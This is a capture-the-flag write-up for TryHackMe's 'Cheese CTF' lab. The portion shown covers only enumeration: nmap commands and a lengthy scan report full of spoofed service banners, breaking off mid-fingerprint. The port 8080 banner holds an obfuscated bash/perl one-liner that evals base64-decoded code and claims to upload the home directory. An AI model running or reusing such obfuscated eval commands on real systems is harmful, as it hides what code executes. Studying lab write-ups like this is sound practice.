💻
TryHackMe Writeups
  • Dodge
  • Reset
  • Hack Smarter Security
  • Creative
  • CyberLens
  • Include
  • Airplane
  • mKingdom
  • Publisher
  • The London Bridge
  • Pyrat
  • Cheese CTF
Powered by GitBook
On this page
  • Enumeration
  • Exploitation
  • Foothold
  • Lateral Movement
  • Privilege Escalation

Cheese CTF

Inspired by the great cheese talk of THM!

PreviousPyrat

Last updated 1 month ago

This work by Manav G Krishna is licensed under CC BY-NC 4.0

Machine IP: 10.10.94.254

Hosts file entry: echo '10.10.94.254 cheese.thm' | sudo tee -a /etc/hosts

Nmap Scan: 

nmap -p- -A -v --min-rate 100 --open -oN cheese_ctf_thm -Pn cheese.thm

Our traditional scan method shows that tons of ports are open.

We can now better the Nmap command using the --top-ports switch, like so:

nmap --top-ports 20 -A -v --min-rate 100 --open -oN cheese_ctf_thm -Pn cheese.thm


Nmap scan report for cheese.thm (10.10.94.254)
Host is up (0.15s latency).

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp?
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_ftp-syst: ERROR: Script execution failed (use -d to debug)
|_ftp-bounce: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: 
|_    550 12345 0f7000f800770008777000000000000000f80008f7f70088000cf00
|_ftp-anon: ERROR: Script execution failed (use -d to debug)
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b1:c1:22:9f:11:10:5f:64:f1:33:72:70:16:3c:80:06 (RSA)
|   256 6d:33:e3:bd:70:62:59:93:4d:ab:8b:fe:ef:e8:a7:b2 (ECDSA)
|_  256 89:2e:17:84:ed:48:7a:ae:d9:8c:9b:a5:8e:24:04:bd (ED25519)
23/tcp   open  telnet?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe, tn3270: 
|_    550 12345 0f8008707ff07ff8000008088ff800000000f7000000f800808ff00
25/tcp   open  smtp?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Hello, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe: 
|_    550 12345 0ff0808800cf0000ffff70000f877f70000c70008008ff8088fff00
|_smtp-commands: SMTP EHLO cheese.thm: failed to receive data: connection closed
53/tcp   open  domain?
|_dns-nsid: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|_    550 4m2v4 FUZZ_HERE
80/tcp   open  http        Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Cheese Shop
110/tcp  open  pop3?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|_    0rrxabcdefghbslucoahayju
111/tcp  open  http        Network Associates ePolicy Orchestrator 94663073
|_http-server-header: Agent-ListenServer-HttpSvr/1.0
135/tcp  open  msrpc?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe: 
|_    HTTP/1.1 178 dServer: BearShare 71341 (QyB
139/tcp  open  http        SAP Internet Graphics Server httpd
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title.
|_http-server-header: SAP Internet Graphics Server
143/tcp  open  http        Cryptologic httpd 83
|_http-server-header: WebServer 83
|_http-title: Site doesn't have a title.
|_imap-capabilities: CAPABILITY
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
443/tcp  open  https?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, Help, NULL, OpenVPN, RPCCheck, RTSPRequest, SSLSessionReq, SSLv23SessionReq, TLSSessionReq, TerminalServerCookie, X11Probe: 
|     Amanda 29097959 NAK HANDLE SEQ 0
|_    ERROR expected "Amanda", got "r
445/tcp  open  gopher
|_gopher-ls: 
993/tcp  open  imaps?
|_imap-capabilities: CAPABILITY
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, SSLv23SessionReq, TLSSessionReq, TerminalServerCookie, X11Probe: 
|_    FrontDoor 5qRocCzvX/
995/tcp  open  http        RapidLogic httpd 81184053 (Motorola VT1000v VoIP Adapter http config)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: VT1000v Status
|_http-server-header: RapidLogic/81184053
1723/tcp open  pptp?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|_    00000
3306/tcp open  imap        Samsung contact imapd 884839
|_mysql-info: ERROR: Script execution failed (use -d to debug)
|_imap-capabilities: CAPABILITY
3389/tcp open  ssh         (protocol 596906843)
| fingerprint-strings: 
|   NULL: 
|_    SSH-596906843-OpenSSH_XoP-DLI NetBSD_Secure_Shell-mIH
5900/tcp open  vnc?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, NULL, RPCCheck, RTSPRequest: 
|     0Nhtprggsm0000vqbyxqql
|     T*MacBookAir29x05
|     AFP3.4
|     AFP3.3
|     AFP3.2
|     AFP3.1
|     AFPX03
|     DHCAST128
|     DHX2
|     Recon1
|     Client Krb v2
|     User Authents
|_    $not_defined_in_RFC4178@please_ignore
8080/tcp open  http-proxy?
| fingerprint-strings: 
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, NULL, RTSPRequest, Socks4, Socks5: 
|_    /bin/bash -c {perl,-e,$0,useSPACEMIME::Base64,cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==} $_=$ARGV[0];~s/SPACE/ /ig;eval;$_=$ARGV[1];eval(decode_base64($_));
9 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port21-TCP:V=7.94SVN%I=7%D=10/6%Time=67028D15%P=x86_64-pc-linux-gnu%r(N
SF:ULL,41,"550\x2012345\x200f7000f800770008777000000000000000f80008f7f7008
SF:8000cf00")%r(GenericLines,41,"550\x2012345\x200f7000f800770008777000000
SF:000000000f80008f7f70088000cf00")%r(Help,41,"550\x2012345\x200f7000f8007
SF:70008777000000000000000f80008f7f70088000cf00")%r(GetRequest,41,"550\x20
SF:12345\x200f7000f800770008777000000000000000f80008f7f70088000cf00")%r(HT
SF:TPOptions,41,"550\x2012345\x200f7000f800770008777000000000000000f80008f
SF:7f70088000cf00")%r(RTSPRequest,41,"550\x2012345\x200f7000f8007700087770
SF:00000000000000f80008f7f70088000cf00")%r(RPCCheck,41,"550\x2012345\x200f
SF:7000f800770008777000000000000000f80008f7f70088000cf00")%r(DNSVersionBin
SF:dReqTCP,41,"550\x2012345\x200f7000f800770008777000000000000000f80008f7f
SF:70088000cf00")%r(DNSStatusRequestTCP,41,"550\x2012345\x200f7000f8007700
SF:08777000000000000000f80008f7f70088000cf00")%r(SSLSessionReq,41,"550\x20
SF:12345\x200f7000f800770008777000000000000000f80008f7f70088000cf00")%r(Te
SF:rminalServerCookie,41,"550\x2012345\x200f7000f8007700087770000000000000
SF:00f80008f7f70088000cf00")%r(TLSSessionReq,41,"550\x2012345\x200f7000f80
SF:0770008777000000000000000f80008f7f70088000cf00")%r(Kerberos,41,"550\x20
SF:12345\x200f7000f800770008777000000000000000f80008f7f70088000cf00")%r(SM
SF:BProgNeg,41,"550\x2012345\x200f7000f800770008777000000000000000f80008f7
SF:f70088000cf00")%r(X11Probe,41,"550\x2012345\x200f7000f80077000877700000
SF:0000000000f80008f7f70088000cf00")%r(FourOhFourRequest,41,"550\x2012345\
SF:x200f7000f800770008777000000000000000f80008f7f70088000cf00")%r(LPDStrin
SF:g,41,"550\x2012345\x200f7000f800770008777000000000000000f80008f7f700880
SF:00cf00")%r(LDAPSearchReq,41,"550\x2012345\x200f7000f8007700087770000000
SF:00000000f80008f7f70088000cf00")%r(LDAPBindReq,41,"550\x2012345\x200f700
SF:0f800770008777000000000000000f80008f7f70088000cf00")%r(SIPOptions,41,"5
SF:50\x2012345\x200f7000f800770008777000000000000000f80008f7f70088000cf00"
SF:)%r(LANDesk-RC,41,"550\x2012345\x200f7000f800770008777000000000000000f8
SF:0008f7f70088000cf00")%r(TerminalServer,41,"550\x2012345\x200f7000f80077
SF:0008777000000000000000f80008f7f70088000cf00");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port23-TCP:V=7.94SVN%I=7%D=10/6%Time=67028D15%P=x86_64-pc-linux-gnu%r(N
SF:ULL,41,"550\x2012345\x200f8008707ff07ff8000008088ff800000000f7000000f80
SF:0808ff00")%r(GenericLines,41,"550\x2012345\x200f8008707ff07ff8000008088
SF:ff800000000f7000000f800808ff00")%r(tn3270,41,"550\x2012345\x200f8008707
SF:ff07ff8000008088ff800000000f7000000f800808ff00")%r(GetRequest,41,"550\x
SF:2012345\x200f8008707ff07ff8000008088ff800000000f7000000f800808ff00")%r(
SF:HTTPOptions,41,"550\x2012345\x200f8008707ff07ff8000008088ff800000000f70
SF:00000f800808ff00")%r(RTSPRequest,41,"550\x2012345\x200f8008707ff07ff800
SF:0008088ff800000000f7000000f800808ff00")%r(RPCCheck,41,"550\x2012345\x20
SF:0f8008707ff07ff8000008088ff800000000f7000000f800808ff00")%r(DNSVersionB
SF:indReqTCP,41,"550\x2012345\x200f8008707ff07ff8000008088ff800000000f7000
SF:000f800808ff00")%r(DNSStatusRequestTCP,41,"550\x2012345\x200f8008707ff0
SF:7ff8000008088ff800000000f7000000f800808ff00")%r(Help,41,"550\x2012345\x
SF:200f8008707ff07ff8000008088ff800000000f7000000f800808ff00")%r(SSLSessio
SF:nReq,41,"550\x2012345\x200f8008707ff07ff8000008088ff800000000f7000000f8
SF:00808ff00")%r(TerminalServerCookie,41,"550\x2012345\x200f8008707ff07ff8
SF:000008088ff800000000f7000000f800808ff00")%r(TLSSessionReq,41,"550\x2012
SF:345\x200f8008707ff07ff8000008088ff800000000f7000000f800808ff00")%r(Kerb
SF:eros,41,"550\x2012345\x200f8008707ff07ff8000008088ff800000000f7000000f8
SF:00808ff00")%r(SMBProgNeg,41,"550\x2012345\x200f8008707ff07ff8000008088f
SF:f800000000f7000000f800808ff00")%r(X11Probe,41,"550\x2012345\x200f800870
SF:7ff07ff8000008088ff800000000f7000000f800808ff00")%r(FourOhFourRequest,4
SF:1,"550\x2012345\x200f8008707ff07ff8000008088ff800000000f7000000f800808f
SF:f00")%r(LPDString,41,"550\x2012345\x200f8008707ff07ff8000008088ff800000
SF:000f7000000f800808ff00")%r(LDAPSearchReq,41,"550\x2012345\x200f8008707f
SF:f07ff8000008088ff800000000f7000000f800808ff00")%r(LDAPBindReq,41,"550\x
SF:2012345\x200f8008707ff07ff8000008088ff800000000f7000000f800808ff00")%r(
SF:SIPOptions,41,"550\x2012345\x200f8008707ff07ff8000008088ff800000000f700
SF:0000f800808ff00")%r(LANDesk-RC,41,"550\x2012345\x200f8008707ff07ff80000
SF:08088ff800000000f7000000f800808ff00");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port25-TCP:V=7.94SVN%I=7%D=10/6%Time=67028D15%P=x86_64-pc-linux-gnu%r(N
SF:ULL,41,"550\x2012345\x200ff0808800cf0000ffff70000f877f70000c70008008ff8
SF:088fff00")%r(Hello,41,"550\x2012345\x200ff0808800cf0000ffff70000f877f70
SF:000c70008008ff8088fff00")%r(Help,41,"550\x2012345\x200ff0808800cf0000ff
SF:ff70000f877f70000c70008008ff8088fff00")%r(GenericLines,41,"550\x2012345
SF:\x200ff0808800cf0000ffff70000f877f70000c70008008ff8088fff00")%r(GetRequ
SF:est,41,"550\x2012345\x200ff0808800cf0000ffff70000f877f70000c70008008ff8
SF:088fff00")%r(HTTPOptions,41,"550\x2012345\x200ff0808800cf0000ffff70000f
SF:877f70000c70008008ff8088fff00")%r(RTSPRequest,41,"550\x2012345\x200ff08
SF:08800cf0000ffff70000f877f70000c70008008ff8088fff00")%r(RPCCheck,41,"550
SF:\x2012345\x200ff0808800cf0000ffff70000f877f70000c70008008ff8088fff00")%
SF:r(DNSVersionBindReqTCP,41,"550\x2012345\x200ff0808800cf0000ffff70000f87
SF:7f70000c70008008ff8088fff00")%r(DNSStatusRequestTCP,41,"550\x2012345\x2
SF:00ff0808800cf0000ffff70000f877f70000c70008008ff8088fff00")%r(SSLSession
SF:Req,41,"550\x2012345\x200ff0808800cf0000ffff70000f877f70000c70008008ff8
SF:088fff00")%r(TerminalServerCookie,41,"550\x2012345\x200ff0808800cf0000f
SF:fff70000f877f70000c70008008ff8088fff00")%r(TLSSessionReq,41,"550\x20123
SF:45\x200ff0808800cf0000ffff70000f877f70000c70008008ff8088fff00")%r(Kerbe
SF:ros,41,"550\x2012345\x200ff0808800cf0000ffff70000f877f70000c70008008ff8
SF:088fff00")%r(SMBProgNeg,41,"550\x2012345\x200ff0808800cf0000ffff70000f8
SF:77f70000c70008008ff8088fff00")%r(X11Probe,41,"550\x2012345\x200ff080880
SF:0cf0000ffff70000f877f70000c70008008ff8088fff00")%r(FourOhFourRequest,41
SF:,"550\x2012345\x200ff0808800cf0000ffff70000f877f70000c70008008ff8088fff
SF:00")%r(LPDString,41,"550\x2012345\x200ff0808800cf0000ffff70000f877f7000
SF:0c70008008ff8088fff00")%r(LDAPSearchReq,41,"550\x2012345\x200ff0808800c
SF:f0000ffff70000f877f70000c70008008ff8088fff00")%r(LDAPBindReq,41,"550\x2
SF:012345\x200ff0808800cf0000ffff70000f877f70000c70008008ff8088fff00")%r(S
SF:IPOptions,41,"550\x2012345\x200ff0808800cf0000ffff70000f877f70000c70008
SF:008ff8088fff00")%r(LANDesk-RC,41,"550\x2012345\x200ff0808800cf0000ffff7
SF:0000f877f70000c70008008ff8088fff00");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port53-TCP:V=7.94SVN%I=7%D=10/6%Time=67028D15%P=x86_64-pc-linux-gnu%r(N
SF:ULL,13,"550\x204m2v4\x20FUZZ_HERE")%r(DNSVersionBindReqTCP,13,"550\x204
SF:m2v4\x20FUZZ_HERE")%r(DNSStatusRequestTCP,13,"550\x204m2v4\x20FUZZ_HERE
SF:")%r(GenericLines,13,"550\x204m2v4\x20FUZZ_HERE")%r(GetRequest,13,"550\
SF:x204m2v4\x20FUZZ_HERE")%r(HTTPOptions,13,"550\x204m2v4\x20FUZZ_HERE")%r
SF:(RTSPRequest,13,"550\x204m2v4\x20FUZZ_HERE")%r(RPCCheck,13,"550\x204m2v
SF:4\x20FUZZ_HERE")%r(Help,13,"550\x204m2v4\x20FUZZ_HERE")%r(SSLSessionReq
SF:,13,"550\x204m2v4\x20FUZZ_HERE")%r(TerminalServerCookie,13,"550\x204m2v
SF:4\x20FUZZ_HERE")%r(TLSSessionReq,13,"550\x204m2v4\x20FUZZ_HERE")%r(Kerb
SF:eros,13,"550\x204m2v4\x20FUZZ_HERE")%r(SMBProgNeg,13,"550\x204m2v4\x20F
SF:UZZ_HERE")%r(X11Probe,13,"550\x204m2v4\x20FUZZ_HERE")%r(FourOhFourReque
SF:st,13,"550\x204m2v4\x20FUZZ_HERE")%r(LPDString,13,"550\x204m2v4\x20FUZZ
SF:_HERE")%r(LDAPSearchReq,13,"550\x204m2v4\x20FUZZ_HERE")%r(LDAPBindReq,1
SF:3,"550\x204m2v4\x20FUZZ_HERE")%r(SIPOptions,13,"550\x204m2v4\x20FUZZ_HE
SF:RE")%r(LANDesk-RC,13,"550\x204m2v4\x20FUZZ_HERE")%r(TerminalServer,13,"
SF:550\x204m2v4\x20FUZZ_HERE")%r(NCP,13,"550\x204m2v4\x20FUZZ_HERE")%r(Not
SF:esRPC,13,"550\x204m2v4\x20FUZZ_HERE")%r(JavaRMI,13,"550\x204m2v4\x20FUZ
SF:Z_HERE")%r(WMSRequest,13,"550\x204m2v4\x20FUZZ_HERE")%r(oracle-tns,13,"
SF:550\x204m2v4\x20FUZZ_HERE")%r(ms-sql-s,13,"550\x204m2v4\x20FUZZ_HERE")%
SF:r(afp,13,"550\x204m2v4\x20FUZZ_HERE")%r(giop,13,"550\x204m2v4\x20FUZZ_H
SF:ERE");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port110-TCP:V=7.94SVN%I=7%D=10/6%Time=67028D15%P=x86_64-pc-linux-gnu%r(
SF:NULL,19,"0rrxabcdefghbslucoahayju\n")%r(GenericLines,19,"0rrxabcdefghbs
SF:lucoahayju\n")%r(GetRequest,19,"0rrxabcdefghbslucoahayju\n")%r(HTTPOpti
SF:ons,19,"0rrxabcdefghbslucoahayju\n")%r(RTSPRequest,19,"0rrxabcdefghbslu
SF:coahayju\n")%r(RPCCheck,19,"0rrxabcdefghbslucoahayju\n")%r(DNSVersionBi
SF:ndReqTCP,19,"0rrxabcdefghbslucoahayju\n")%r(DNSStatusRequestTCP,19,"0rr
SF:xabcdefghbslucoahayju\n")%r(Help,19,"0rrxabcdefghbslucoahayju\n")%r(SSL
SF:SessionReq,19,"0rrxabcdefghbslucoahayju\n")%r(TerminalServerCookie,19,"
SF:0rrxabcdefghbslucoahayju\n")%r(TLSSessionReq,19,"0rrxabcdefghbslucoahay
SF:ju\n")%r(Kerberos,19,"0rrxabcdefghbslucoahayju\n")%r(SMBProgNeg,19,"0rr
SF:xabcdefghbslucoahayju\n")%r(X11Probe,19,"0rrxabcdefghbslucoahayju\n")%r
SF:(FourOhFourRequest,19,"0rrxabcdefghbslucoahayju\n")%r(LPDString,19,"0rr
SF:xabcdefghbslucoahayju\n")%r(LDAPSearchReq,19,"0rrxabcdefghbslucoahayju\
SF:n")%r(LDAPBindReq,19,"0rrxabcdefghbslucoahayju\n")%r(SIPOptions,19,"0rr
SF:xabcdefghbslucoahayju\n")%r(LANDesk-RC,19,"0rrxabcdefghbslucoahayju\n")
SF:%r(TerminalServer,19,"0rrxabcdefghbslucoahayju\n")%r(NCP,19,"0rrxabcdef
SF:ghbslucoahayju\n")%r(NotesRPC,19,"0rrxabcdefghbslucoahayju\n")%r(JavaRM
SF:I,19,"0rrxabcdefghbslucoahayju\n")%r(WMSRequest,19,"0rrxabcdefghbslucoa
SF:hayju\n")%r(oracle-tns,19,"0rrxabcdefghbslucoahayju\n")%r(ms-sql-s,19,"
SF:0rrxabcdefghbslucoahayju\n")%r(afp,19,"0rrxabcdefghbslucoahayju\n")%r(g
SF:iop,19,"0rrxabcdefghbslucoahayju\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port135-TCP:V=7.94SVN%I=7%D=10/6%Time=67028D15%P=x86_64-pc-linux-gnu%r(
SF:NULL,33,"HTTP/1\.1\x20178\x20dServer:\x20BearShare\x2071341\x20\(QyB\x9
SF:f{\xef\xd3X\)\r\n\n")%r(DNSVersionBindReqTCP,33,"HTTP/1\.1\x20178\x20dS
SF:erver:\x20BearShare\x2071341\x20\(QyB\x9f{\xef\xd3X\)\r\n\n")%r(SMBProg
SF:Neg,33,"HTTP/1\.1\x20178\x20dServer:\x20BearShare\x2071341\x20\(QyB\x9f
SF:{\xef\xd3X\)\r\n\n")%r(GenericLines,33,"HTTP/1\.1\x20178\x20dServer:\x2
SF:0BearShare\x2071341\x20\(QyB\x9f{\xef\xd3X\)\r\n\n")%r(GetRequest,33,"H
SF:TTP/1\.1\x20178\x20dServer:\x20BearShare\x2071341\x20\(QyB\x9f{\xef\xd3
SF:X\)\r\n\n")%r(HTTPOptions,33,"HTTP/1\.1\x20178\x20dServer:\x20BearShare
SF:\x2071341\x20\(QyB\x9f{\xef\xd3X\)\r\n\n")%r(RTSPRequest,33,"HTTP/1\.1\
SF:x20178\x20dServer:\x20BearShare\x2071341\x20\(QyB\x9f{\xef\xd3X\)\r\n\n
SF:")%r(RPCCheck,33,"HTTP/1\.1\x20178\x20dServer:\x20BearShare\x2071341\x2
SF:0\(QyB\x9f{\xef\xd3X\)\r\n\n")%r(DNSStatusRequestTCP,33,"HTTP/1\.1\x201
SF:78\x20dServer:\x20BearShare\x2071341\x20\(QyB\x9f{\xef\xd3X\)\r\n\n")%r
SF:(Help,33,"HTTP/1\.1\x20178\x20dServer:\x20BearShare\x2071341\x20\(QyB\x
SF:9f{\xef\xd3X\)\r\n\n")%r(SSLSessionReq,33,"HTTP/1\.1\x20178\x20dServer:
SF:\x20BearShare\x2071341\x20\(QyB\x9f{\xef\xd3X\)\r\n\n")%r(TerminalServe
SF:rCookie,33,"HTTP/1\.1\x20178\x20dServer:\x20BearShare\x2071341\x20\(QyB
SF:\x9f{\xef\xd3X\)\r\n\n")%r(TLSSessionReq,33,"HTTP/1\.1\x20178\x20dServe
SF:r:\x20BearShare\x2071341\x20\(QyB\x9f{\xef\xd3X\)\r\n\n")%r(Kerberos,33
SF:,"HTTP/1\.1\x20178\x20dServer:\x20BearShare\x2071341\x20\(QyB\x9f{\xef\
SF:xd3X\)\r\n\n")%r(X11Probe,33,"HTTP/1\.1\x20178\x20dServer:\x20BearShare
SF:\x2071341\x20\(QyB\x9f{\xef\xd3X\)\r\n\n")%r(FourOhFourRequest,33,"HTTP
SF:/1\.1\x20178\x20dServer:\x20BearShare\x2071341\x20\(QyB\x9f{\xef\xd3X\)
SF:\r\n\n")%r(LPDString,33,"HTTP/1\.1\x20178\x20dServer:\x20BearShare\x207
SF:1341\x20\(QyB\x9f{\xef\xd3X\)\r\n\n")%r(LDAPSearchReq,33,"HTTP/1\.1\x20
SF:178\x20dServer:\x20BearShare\x2071341\x20\(QyB\x9f{\xef\xd3X\)\r\n\n")%
SF:r(LDAPBindReq,33,"HTTP/1\.1\x20178\x20dServer:\x20BearShare\x2071341\x2
SF:0\(QyB\x9f{\xef\xd3X\)\r\n\n")%r(SIPOptions,33,"HTTP/1\.1\x20178\x20dSe
SF:rver:\x20BearShare\x2071341\x20\(QyB\x9f{\xef\xd3X\)\r\n\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port443-TCP:V=7.94SVN%I=7%D=10/6%Time=67028D15%P=x86_64-pc-linux-gnu%r(
SF:NULL,47,"Amanda\x2029097959\x20NAK\x20HANDLE\x20\x20SEQ\x200\nERROR\x20
SF:expected\x20\"Amanda\",\x20got\x20\"r\xfe\x1d\x13\"\n\n")%r(SSLSessionR
SF:eq,47,"Amanda\x2029097959\x20NAK\x20HANDLE\x20\x20SEQ\x200\nERROR\x20ex
SF:pected\x20\"Amanda\",\x20got\x20\"r\xfe\x1d\x13\"\n\n")%r(TLSSessionReq
SF:,47,"Amanda\x2029097959\x20NAK\x20HANDLE\x20\x20SEQ\x200\nERROR\x20expe
SF:cted\x20\"Amanda\",\x20got\x20\"r\xfe\x1d\x13\"\n\n")%r(SSLv23SessionRe
SF:q,47,"Amanda\x2029097959\x20NAK\x20HANDLE\x20\x20SEQ\x200\nERROR\x20exp
SF:ected\x20\"Amanda\",\x20got\x20\"r\xfe\x1d\x13\"\n\n")%r(X11Probe,47,"A
SF:manda\x2029097959\x20NAK\x20HANDLE\x20\x20SEQ\x200\nERROR\x20expected\x
SF:20\"Amanda\",\x20got\x20\"r\xfe\x1d\x13\"\n\n")%r(OpenVPN,47,"Amanda\x2
SF:029097959\x20NAK\x20HANDLE\x20\x20SEQ\x200\nERROR\x20expected\x20\"Aman
SF:da\",\x20got\x20\"r\xfe\x1d\x13\"\n\n")%r(GenericLines,47,"Amanda\x2029
SF:097959\x20NAK\x20HANDLE\x20\x20SEQ\x200\nERROR\x20expected\x20\"Amanda\
SF:",\x20got\x20\"r\xfe\x1d\x13\"\n\n")%r(GetRequest,47,"Amanda\x202909795
SF:9\x20NAK\x20HANDLE\x20\x20SEQ\x200\nERROR\x20expected\x20\"Amanda\",\x2
SF:0got\x20\"r\xfe\x1d\x13\"\n\n")%r(HTTPOptions,47,"Amanda\x2029097959\x2
SF:0NAK\x20HANDLE\x20\x20SEQ\x200\nERROR\x20expected\x20\"Amanda\",\x20got
SF:\x20\"r\xfe\x1d\x13\"\n\n")%r(RTSPRequest,47,"Amanda\x2029097959\x20NAK
SF:\x20HANDLE\x20\x20SEQ\x200\nERROR\x20expected\x20\"Amanda\",\x20got\x20
SF:\"r\xfe\x1d\x13\"\n\n")%r(RPCCheck,47,"Amanda\x2029097959\x20NAK\x20HAN
SF:DLE\x20\x20SEQ\x200\nERROR\x20expected\x20\"Amanda\",\x20got\x20\"r\xfe
SF:\x1d\x13\"\n\n")%r(DNSVersionBindReqTCP,47,"Amanda\x2029097959\x20NAK\x
SF:20HANDLE\x20\x20SEQ\x200\nERROR\x20expected\x20\"Amanda\",\x20got\x20\"
SF:r\xfe\x1d\x13\"\n\n")%r(DNSStatusRequestTCP,47,"Amanda\x2029097959\x20N
SF:AK\x20HANDLE\x20\x20SEQ\x200\nERROR\x20expected\x20\"Amanda\",\x20got\x
SF:20\"r\xfe\x1d\x13\"\n\n")%r(Help,47,"Amanda\x2029097959\x20NAK\x20HANDL
SF:E\x20\x20SEQ\x200\nERROR\x20expected\x20\"Amanda\",\x20got\x20\"r\xfe\x
SF:1d\x13\"\n\n")%r(TerminalServerCookie,47,"Amanda\x2029097959\x20NAK\x20
SF:HANDLE\x20\x20SEQ\x200\nERROR\x20expected\x20\"Amanda\",\x20got\x20\"r\
SF:xfe\x1d\x13\"\n\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port993-TCP:V=7.94SVN%I=7%D=10/6%Time=67028D15%P=x86_64-pc-linux-gnu%r(
SF:NULL,25,"\xff\xfb\x03\xff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFrontDoor\x205
SF:qRocCzvX/\n")%r(SSLSessionReq,25,"\xff\xfb\x03\xff\xfb0\xff\xfb0\xff\xf
SF:d0\xffg\r\rFrontDoor\x205qRocCzvX/\n")%r(TLSSessionReq,25,"\xff\xfb\x03
SF:\xff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFrontDoor\x205qRocCzvX/\n")%r(SSLv2
SF:3SessionReq,25,"\xff\xfb\x03\xff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFrontDo
SF:or\x205qRocCzvX/\n")%r(GenericLines,25,"\xff\xfb\x03\xff\xfb0\xff\xfb0\
SF:xff\xfd0\xffg\r\rFrontDoor\x205qRocCzvX/\n")%r(GetRequest,25,"\xff\xfb\
SF:x03\xff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFrontDoor\x205qRocCzvX/\n")%r(HT
SF:TPOptions,25,"\xff\xfb\x03\xff\xfb0\xff\xfb0\xff\xfd0\xffg\r\rFrontDoor
